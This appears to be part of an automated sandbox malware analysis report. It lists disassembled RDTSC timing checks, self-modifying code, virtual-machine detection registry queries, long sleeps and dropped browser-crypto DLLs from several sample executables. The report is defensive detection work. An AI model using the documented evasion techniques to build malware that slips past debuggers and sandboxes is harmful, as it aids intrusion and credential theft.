Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702C53 second address: 702C6F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4D39092h 0x00000008 jmp 00007FA6C4D3908Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702C6F second address: 702CE3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA6C4C2AB38h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 mov ebx, dword ptr [ebp+122D3D20h] 0x0000002d mov ax, 8586h 0x00000031 popad 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FA6C4C2AB38h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push F91C063Dh 0x00000053 pushad 0x00000054 jmp 00007FA6C4C2AB45h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702CE3 second address: 702CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702ECC second address: 702ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702ED0 second address: 702ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702F84 second address: 702F97 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4C2AB38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702F97 second address: 702FED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FA6C4D39088h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D2257h], eax 0x00000029 jmp 00007FA6C4D3908Ah 0x0000002e push 00000000h 0x00000030 push 2E1B7E9Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA6C4D39092h 0x0000003c rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702FED second address: 703091 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2E1B7E1Bh 0x00000010 movzx ecx, bx 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FA6C4C2AB38h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor esi, dword ptr [ebp+122D3C80h] 0x00000035 push 00000000h 0x00000037 call 00007FA6C4C2AB42h 0x0000003c jmp 00007FA6C4C2AB45h 0x00000041 pop edi 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push edx 0x00000047 call 00007FA6C4C2AB38h 0x0000004c pop edx 0x0000004d mov dword ptr [esp+04h], edx 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc edx 0x0000005a push edx 0x0000005b ret 0x0000005c pop edx 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D33E1h], edi 0x00000064 call 00007FA6C4C2AB39h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 703091 second address: 703097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 703097 second address: 7030B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4C2AB40h 0x00000010 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030B2 second address: 7030CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA6C4D3908Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030CF second address: 7030D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030D4 second address: 7030DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030DA second address: 7030FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA6C4C2AB43h 0x00000015 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030FD second address: 703102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 703102 second address: 703175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edi 0x0000000f jbe 00007FA6C4C2AB36h 0x00000015 pop edi 0x00000016 pop eax 0x00000017 pop eax 0x00000018 jmp 00007FA6C4C2AB40h 0x0000001d lea ebx, dword ptr [ebp+12457B08h] 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FA6C4C2AB38h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d mov ecx, 4EE75EFAh 0x00000042 jmp 00007FA6C4C2AB46h 0x00000047 push eax 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FA6C4C2AB36h 0x00000051 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7162B6 second address: 7162BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72306A second address: 72307C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA6C4C2AB3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7231F3 second address: 7231FD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4D3908Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7231FD second address: 723226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 jng 00007FA6C4C2AB36h 0x0000000d jmp 00007FA6C4C2AB44h 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 723226 second address: 72323C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FA6C4D39086h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72323C second address: 723240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 723541 second address: 723548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 723697 second address: 72369C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72369C second address: 7236A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7236A2 second address: 7236A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248A9 second address: 7248B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248B0 second address: 7248D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA6C4C2AB36h 0x00000009 jmp 00007FA6C4C2AB43h 0x0000000e popad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248D0 second address: 7248D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248D6 second address: 7248F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4C2AB45h 0x00000010 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248F6 second address: 7248FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248FA second address: 724904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724904 second address: 72490E instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72490E second address: 72491A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA6C4C2AB36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724C2B second address: 724C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Dh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724F6F second address: 724F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724F75 second address: 724F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4D39086h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724F7F second address: 724F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7293E6 second address: 7293EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72AAFF second address: 72AB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72AB05 second address: 72AB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 6E3B2A second address: 6E3B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 6E3B30 second address: 6E3B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6C4D39094h 0x0000000e jmp 00007FA6C4D3908Fh 0x00000013 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CB63 second address: 72CB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CB69 second address: 72CB8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6C4D3908Ch 0x00000014 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CFC2 second address: 72CFC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CFC8 second address: 72CFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CFEA second address: 72CFF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72BFFE second address: 72C003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72C003 second address: 72C020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FA6C4C2AB38h 0x00000015 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72D329 second address: 72D342 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FA6C4D390A8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FA6C4D39086h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733B28 second address: 733B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733173 second address: 73318C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4D39086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FA6C4D39086h 0x00000013 js 00007FA6C4D39086h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 73318C second address: 733190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733190 second address: 7331D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FA6C4D39098h 0x00000014 jmp 00007FA6C4D3908Eh 0x00000019 popad 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 73339A second address: 7333BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB48h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA6C4C2AB36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7333BE second address: 7333C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 73366B second address: 733697 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007FA6C4C2AB36h 0x0000000f jo 00007FA6C4C2AB36h 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FA6C4C2AB3Fh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733697 second address: 73369D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5D815A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 600AFB instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 57EE29 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 57EF09 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 72D099 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 72BA8F instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 734510 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 57EDFA instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 7B47E4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EE29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EF09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F4D099 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F4BA8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F54510 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EDFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FD47E4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: 825826 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: 9F4CA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: 9D4D6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: A596F1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 428A80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5D989D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5EF478 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 667F3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Special instruction interceptor: First address: FA815A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Special instruction interceptor: First address: FD0AFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 29DC42 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 29DD58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 29DC4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 437F43 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Special instruction interceptor: First address: 4D9D3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5FFDC42 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5FFDD58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 5FFDC4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Special instruction interceptor: First address: 6197F43 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Memory allocated: 4D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Memory allocated: 4B30000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_04D90328 rdtsc 14_2_04D90328
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 592
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
